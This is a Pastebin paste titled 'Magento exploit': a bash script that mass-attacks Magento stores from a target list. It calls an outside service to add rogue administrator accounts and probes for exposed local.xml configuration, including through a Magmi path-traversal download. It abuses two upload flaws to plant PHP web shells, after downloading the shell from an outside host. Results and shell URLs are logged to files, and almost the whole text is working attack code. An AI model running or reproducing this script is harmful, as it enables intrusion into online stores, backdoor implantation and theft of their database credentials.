SHARE
TWEET

Magento exploit

greyx Apr 30th, 2017 1,050 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # bash magento.sh list.txt user password -
  3. #function
  4. addadmin(){
  5.     curl --max-time 10 --connect-timeout 10 --silent "http://btc-market.net/bitcoin/magAPI.php" --data "domain=$1&username=$2&password=$3" > addadmin.json
  6.     exploitadd=`cat addadmin.json | python -c "import json,sys;obj=json.load(sys.stdin);print obj['exploit']['AddAdmin']"`
  7.     downloader=`cat addadmin.json | python -c "import json,sys;obj=json.load(sys.stdin);print obj['exploit']['Downloader']"`
  8.     cat addadmin.json | grep 'price' > /dev/null;price=$?
  9. if [ $price -eq 0 ]
  10.     then
  11.     echo "========================================="
  12.     echo "ADD ADMIN [+]"
  13.     echo "Domain : $1"
  14.     echo "Username : $2"
  15.     echo "Password : $3"
  16.     echo "Login Admin : $exploitadd"
  17.     echo "Login Downloader : $downloader"
  18.     echo "=========================================" >> shoplift.txt
  19.     echo "Domain : $1" >> shoplift.txt
  20.     echo "Username : $2" >> shoplift.txt
  21.     echo "Password : $3" >> shoplift.txt
  22.     echo "Login Admin : $exploitadd" >> shoplift.txt
  23.     echo "Login Downloader : $downloader" >> shoplift.txt
  24.     echo "=========================================" >> shoplift.txt
  25.     if [ $price -eq 0 ]
  26.         then
  27.             prices=`cat addadmin.json | python -c "import json,sys;obj=json.load(sys.stdin);print obj['infoAdmin']['price']"`
  28.             echo "Total Transaction : $prices"
  29.     fi
  30. else
  31. echo "========================================="
  32. echo "ADD ADMIN [-]"
  33. echo "Domain : $1"
  34. echo "[STATUS : NOT VULN]"
  35. fi
  36.     echo "========================================="
  37. }
  38. lfi(){
  39.     curl --max-time 10 --connect-timeout 10 --silent "$1/$2" | grep 'frontName' > /dev/null;lfi=$?
  40.     if [ $lfi -eq 0 ]
  41.         then
  42.             echo "$1 => [$4 FOUND]"
  43.             echo "$1/$2 => [OK]" >> lfi.txt
  44.         else
  45.             echo "$1 => [$4 NOTFOUND]"
  46.     fi
  47. }
  48. jsupload(){
  49. curl --max-time 10 --connect-timeout 10 --silent -A "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" -F "files[]=@sj.php" --request POST "$1/js/webforms/upload/index.php" | grep 'size":' > /dev/null;webforms=$?
  50. if [ $webforms -eq 0 ];then
  51. echo "[STATUS : VULN]"
  52. echo "Created BackDoor(SHELL):"
  53. for a in sj.php sj.php5 sj.php3 sj.phtml
  54. do
  55. curl --max-time 10 --connect-timeout 10 --silent -A "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" -F "files[]=@$a" --request POST "$1/js/webforms/upload/index.php" > webformsshell
  56. ran=$(cat webformsshell | cut -d ':' -f 5 | cut -d '"' -f 2)
  57. curl -s "$1/js/webforms/upload/files/${ran}/$a" > checkreadywebforms
  58. cat checkreadywebforms | grep 'incovers' > /dev/null;checkreadywebforms=$?
  59. if [ $checkreadywebforms -eq 0 ];then
  60. echo "- $1/js/webforms/upload/files/${ran}/$a SUCCESS"
  61. echo "- $1/js/webforms/upload/files/${ran}/$a SUCCESS" >> shell.txt
  62. else
  63. echo "- $1/js/webforms/upload/files/${ran}/$a FAILED"
  64. fi
  65. done
  66. else
  67. echo "[STATUS : NOT VULN]"
  68. fi
  69. }
  70. tinyupload(){
  71. curl -s "$1/js/rokmage_tinymce/tinyupload.php" | grep 'tuUploadFile' > /dev/null;rokmage=$?
  72. if [ $rokmage -eq 0 ];then
  73. echo "[STATUS : VULN]"
  74. echo "Created BackDoor(SHELL):"
  75. for a in sj.php sj.php5 sj.php3 sj.phtml
  76. do
  77. curl -s --max-time 10 --connect-timeout 10 --silent -A "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" -F "tuUploadFile[]=@$a" --request POST "$1/js/rokmage_tinymce/tinyupload.php" > mbuts
  78. curl -s "$1/media/rt-tinymce-uploads/$a" > tinybackdoor
  79. if [ ! -f tinybackdoor ];then
  80. continue
  81. fi
  82. cat tinybackdoor | grep 'incovers' > /dev/null;tinybackdoor=$?
  83. if [ $tinybackdoor -eq 0 ];then
  84. echo "- $1/media/rt-tinymce-uploads/$a SUCCESS"
  85. echo "- $1/media/rt-tinymce-uploads/$a SUCCESS" >> shell.txt
  86. else
  87. echo "- $1/media/rt-tinymce-uploads/$a FAILED"
  88. fi
  89. done
  90. else
  91. echo "[STATUS : NOT VULN]"
  92. fi
  93. }
  94. backdoor(){
  95. curl -s "jennessfarm.com/sj.txt" > sj.php
  96. for a in sj.php5 sj.php3 sj.phtml
  97. do
  98. cp sj.php $a
  99. done
  100. }
  101. #layout
  102. if [ ! -f sj.php ];then
  103. backdoor
  104. fi
  105. for sites in `cat $1`
  106. do
  107. addadmin "$sites" $2 $3
  108. echo "LFI AND LFD [+]"
  109. lfi "$sites" "/app/etc/local.xml" "1" "default"
  110. lfi "$sites" "/magmi/web/download_file.php?file=../../app/etc/local.xml" "2" "Magmi"
  111. echo "========================================="
  112. echo "JS Webform (Upload Vulnerbility)"
  113. jsupload "$sites"
  114. echo "========================================="
  115. echo "TinyExploit (Upload Vulnerbility)"
  116. tinyupload "$sites"
  117. echo "========================================="
  118. done
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top